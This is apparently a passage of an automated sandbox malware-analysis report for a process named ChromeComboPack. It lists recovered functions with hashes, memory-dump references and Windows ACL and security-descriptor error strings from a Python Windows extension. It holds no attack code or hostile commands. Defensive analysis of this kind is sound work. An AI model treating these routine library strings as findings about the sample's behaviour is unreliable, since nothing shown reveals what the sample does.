                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AbsoluteErr_FormatMakemallocmemset
                                                                                                                                                                                                                                                • String ID: ($MakeAbsoluteSD$Unable to allocate %d bytes
                                                                                                                                                                                                                                                • API String ID: 1436552674-2130869594
                                                                                                                                                                                                                                                • Opcode ID: e9e880d134da8da5eea3fd779c7919a1fed72d2f02bb0726c0d88128c0315eeb
                                                                                                                                                                                                                                                • Instruction ID: 6a99eda928f305a7521d5c2cc790aa4e054519095db57745e5800b37c7d0e47a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9e880d134da8da5eea3fd779c7919a1fed72d2f02bb0726c0d88128c0315eeb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96815032B0AB42AAEB588F62E8606B97BA0FF48B94F484075DD4D43B54EF3CE545C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BuildErr_StringValue$CharFromUnicode_Wide
                                                                                                                                                                                                                                                • String ID: AccessMode$AccessPermissions$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
                                                                                                                                                                                                                                                • API String ID: 4150572817-4268317626
                                                                                                                                                                                                                                                • Opcode ID: 4d186b5e9dc2c61247186536ffd7d2019c2e2360de785c2d6a2c767b29aa4ea3
                                                                                                                                                                                                                                                • Instruction ID: c66f98c06a53a0c02e5524d0bfdb7f654625400ca96bd1b2eed77bbf809d8c4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d186b5e9dc2c61247186536ffd7d2019c2e2360de785c2d6a2c767b29aa4ea3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD516936B0AB52A6EB588F15E860079BBB0FB88B94F544276DA4E43764DF3CF444C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Format$AccessAuditObjectfree$Arg_ErrorLastLengthParseStringTuplemallocmemcpymemset
                                                                                                                                                                                                                                                • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessObjectAce$AddAuditAccessObjectAce not supported by this version of Windows$AddAuditAccessObjectAce: unable to allocated %d bytes$PyACL::AddAuditAccessObjectAce$The object is not a PySID object$lllOOOii:AddAuditAccessObjectAce
                                                                                                                                                                                                                                                • API String ID: 282185603-1609464327
                                                                                                                                                                                                                                                • Opcode ID: 6db4bf8d7cc1094b69b0c3c0ffc797cd5642a177bd4620f33dfc7cf4a51c445a
                                                                                                                                                                                                                                                • Instruction ID: 3d0b255c028edd1493c36da024708164bb3b432e2cb8bb6c7921c415b21a4956
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6db4bf8d7cc1094b69b0c3c0ffc797cd5642a177bd4620f33dfc7cf4a51c445a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9812D37B1AA42A6EB58CF61E8606B97BB1FB88B88F444175DE4E53A54DF3CE405C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Arg_FormatParseStringTuple
                                                                                                                                                                                                                                                • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAceEx$AddAuditAccessAceEx not supported by this version of Windows$AddAuditAccessAceEx: unable to allocated %d bytes$PyACL::AddAuditAccessAceEx$The object is not a PySID object$lllOii:AddAuditAccessAceEx
                                                                                                                                                                                                                                                • API String ID: 901859003-3541680958
                                                                                                                                                                                                                                                • Opcode ID: 165862e674f47473ae485717e6ccc81d22178b3852c41b2c0743920cb5c77fd5
                                                                                                                                                                                                                                                • Instruction ID: 7366d41c016ba248181f4593e90a47a3685bf9dcfd191a0bcd2b199f647a90a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 165862e674f47473ae485717e6ccc81d22178b3852c41b2c0743920cb5c77fd5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D615037B09A42A6EB68CF25E460679BBA0FF84B84F544075DA8D43B64DF3CE549C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$DeallocFormatString$CharFreeMem_Sequence_TupleUnicode_Widefreemallocmemset
                                                                                                                                                                                                                                                • String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Sequence can contain at most %d items$Unable to allocate %d bytes
                                                                                                                                                                                                                                                • API String ID: 1433913835-2102981847
                                                                                                                                                                                                                                                • Opcode ID: 21f8da52230d937b978eb4a31948a6c2f75707e7583cefa331ccf9397c2dc41d
                                                                                                                                                                                                                                                • Instruction ID: aaf8a91da1dc043ebad7ec77f70439b723beb0aed516007a2c43b4ad074ecf6d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21f8da52230d937b978eb4a31948a6c2f75707e7583cefa331ccf9397c2dc41d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8512A33B0AB52A6FA58DF15E8641786BA0FB88F94F494071DA4E43760EE3CF845C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$AccessAuditFormatfree$Arg_ErrorLastLengthParseStringTuplemallocmemcpymemset
                                                                                                                                                                                                                                                • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAce$AddAuditAccessAce: unable to allocated %d bytes$PyACL::AddAuditAccessAce$The object is not a PySID object$llOii:AddAuditAccessAce
                                                                                                                                                                                                                                                • API String ID: 3041754842-240227349
                                                                                                                                                                                                                                                • Opcode ID: ca061b9d969e830fbae753d764eb1414781053fa57e96a3fb5829134bc3ab70a
                                                                                                                                                                                                                                                • Instruction ID: 0a30c7b30d29a196cefd8500849fa74abea134432d7a8d5b66c0330f606fea32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca061b9d969e830fbae753d764eb1414781053fa57e96a3fb5829134bc3ab70a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3515F27B0AA42A6EB18CF66E8645B97BA1FF88B84F444075DA4E47760DF3CF449C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: free$DescriptorSecurity$Err_Group$Arg_DaclFormatOwnerParseSaclStringTupleValidmalloc
                                                                                                                                                                                                                                                • String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorGroup$SetSecurityDescriptorGroup - invalid sid$The object is not a PySID object
                                                                                                                                                                                                                                                • API String ID: 1524979833-2851344522
                                                                                                                                                                                                                                                • Opcode ID: 9f9b1e1cbeb73acd82663894f1a7e5a2444669f7bc6680b719a6a31e5c7f3ed6
                                                                                                                                                                                                                                                • Instruction ID: 3cfc479e1a53042172258072d11c05aaa4d0e84a1cdb7521beb8cb700f88426c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f9b1e1cbeb73acd82663894f1a7e5a2444669f7bc6680b719a6a31e5c7f3ed6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46514127B0AA12A6FB5D9F75D8602B92BA4BF44F88F8844B2DD0E47A54DF3DE545C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                                                                • String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$DeviceName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 3849944921-3701856451
                                                                                                                                                                                                                                                • Opcode ID: 7ea5646d6b80bd89ae1ee9a082443ed9e2ebac4530fa64dd982fa5363be63c70
                                                                                                                                                                                                                                                • Instruction ID: cb48b64557254a75797a1c0b03fd54887ccc5a485d8a1ca0bd032260784ce9bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ea5646d6b80bd89ae1ee9a082443ed9e2ebac4530fa64dd982fa5363be63c70
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF418127F1AB42A1FA58CF55E4A02796B70FF84B94F545272DA4E47665DF2CF484C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                                                                • String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$FormName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 3849944921-358745228
                                                                                                                                                                                                                                                • Opcode ID: 1e2feec65036cf88bce28d36404236980f567f99f77ede5303f43bdc515e198d
                                                                                                                                                                                                                                                • Instruction ID: 311bf9e407a95c40c51362cbd94b2ea3ee782d6a73d04e6e70a52e7577b72991
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e2feec65036cf88bce28d36404236980f567f99f77ede5303f43bdc515e198d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E418F27B1AB42A2EA5CCF15E4A02786B60FF85F94F545172DA8E477A4DF2DF485C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String$CharClearFreeMem_Unicode_Wide
                                                                                                                                                                                                                                                • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Only strings and iids can be converted to a CLSID.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 443722841-2914159855
                                                                                                                                                                                                                                                • Opcode ID: 4a4796656935d043cec4a38253bfaec0730b2e87b38c15c541f6476bdc834749
                                                                                                                                                                                                                                                • Instruction ID: db6f4e23732354ab93c281d7e6a76fd41ca1cd86ea8cd41d88c0976197f1465f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a4796656935d043cec4a38253bfaec0730b2e87b38c15c541f6476bdc834749
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50411C27B0AB42A1EA588F15E4642786BA1BF88FA8F4851B2D94E47764DF7DF448C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurityfree$Err_SaclString$Arg_DaclGroupLengthOwnerParseTupleValid
                                                                                                                                                                                                                                                • String ID: SetSecurityDescriptorSacl$The object is not a PyACL object$iOi:SetSacl
                                                                                                                                                                                                                                                • API String ID: 1467358711-1973599164
                                                                                                                                                                                                                                                • Opcode ID: 9231b8ea572b5636ead66590a9776eb837efe4897c4311e3970fda6495e9ad4a
                                                                                                                                                                                                                                                • Instruction ID: a042ffc680c801f478cb4e27fbfca053a2aef25d118dc2c9ead19b2b9112ac7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9231b8ea572b5636ead66590a9776eb837efe4897c4311e3970fda6495e9ad4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27517F27B06A12A6FB598F61D8606F82BA0FF44F88F8844B2DD0E57A54DF3CE546C310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurityfree$Err_OwnerString$Arg_DaclGroupLengthParseSaclTupleValid
                                                                                                                                                                                                                                                • String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorOwner$The object is not a PySID object
                                                                                                                                                                                                                                                • API String ID: 965136164-2833774516
                                                                                                                                                                                                                                                • Opcode ID: f308e441dfbb53ca07801ac1447a774fa23f0ff6a235abad11ef225bd6e745d2
                                                                                                                                                                                                                                                • Instruction ID: cf4c18f19b8ae72c4199e8b72ae7245a507d86332328254eeeb93b92929b20c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f308e441dfbb53ca07801ac1447a774fa23f0ff6a235abad11ef225bd6e745d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35514227B0AA12A9EB589F61D8602B82BA5FF54FC4F884472ED0E57A54DF3CE445C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
                                                                                                                                                                                                                                                • String ID: Identifier must be PySID object when TrusteeForm = TRUSTEE_IS_SID$Identifier must be string/unicode when TrusteeForm = TRUSTEE_IS_NAME$Invalid value for TrusteeForm$The object is not a PySID object$Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}$TrusteeForm not yet supported$llO|Ol
                                                                                                                                                                                                                                                • API String ID: 959004690-581804069
                                                                                                                                                                                                                                                • Opcode ID: c4c0ce628861c8fec1ceac88b97acf6f7d34d5cf582ff69800a3f1226fa9a1b6
                                                                                                                                                                                                                                                • Instruction ID: 2b8572279f5bace1c4783011a0d201898c4b65ee96ee6356592c91a79340e8db
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4c0ce628861c8fec1ceac88b97acf6f7d34d5cf582ff69800a3f1226fa9a1b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD515D37B0AB42A1EB688F15E464579BBA0FB88B84F488071CA4D47754EF3DF458C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Buffer_ClearFormatFreeMem_ReleaseString$BufferCharLong_Object_OccurredUnicode_VoidWide
                                                                                                                                                                                                                                                • String ID: Buffer cannot be None$Buffer length can be at most %d characters$WPARAM must be a unicode string, int, or buffer object (got %s)
                                                                                                                                                                                                                                                • API String ID: 3109676845-3026970096
                                                                                                                                                                                                                                                • Opcode ID: c0d59195eee20e608be03f930a8afed0d4afed418b1253203d241cab4f1e62ee
                                                                                                                                                                                                                                                • Instruction ID: 687b209f8e7c120f45b96ecb74239bec7c392025a72d24f1475be7bded7be6a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0d59195eee20e608be03f930a8afed0d4afed418b1253203d241cab4f1e62ee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7251FB27B0AE42A5EB598F25E5642386BA0FF88F98F484071DA8D47754DF3CE894C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String$BuildCharFromUnicode_ValueWide
                                                                                                                                                                                                                                                • String ID: Identifier$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}
                                                                                                                                                                                                                                                • API String ID: 2305401427-1816636059
                                                                                                                                                                                                                                                • Opcode ID: 257fee3f03db89f1de94a1dcf2e0eae39d905db714e31581683085fd8502cec9
                                                                                                                                                                                                                                                • Instruction ID: b162ef3ad94b76f80d2d771aac207306256af230b2f13b44a11d72c74fba22fa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 257fee3f03db89f1de94a1dcf2e0eae39d905db714e31581683085fd8502cec9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31416E32B0AA52A5EB988F15F860279BBB0FB84B94F448272CA5D43764DF3CF455C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
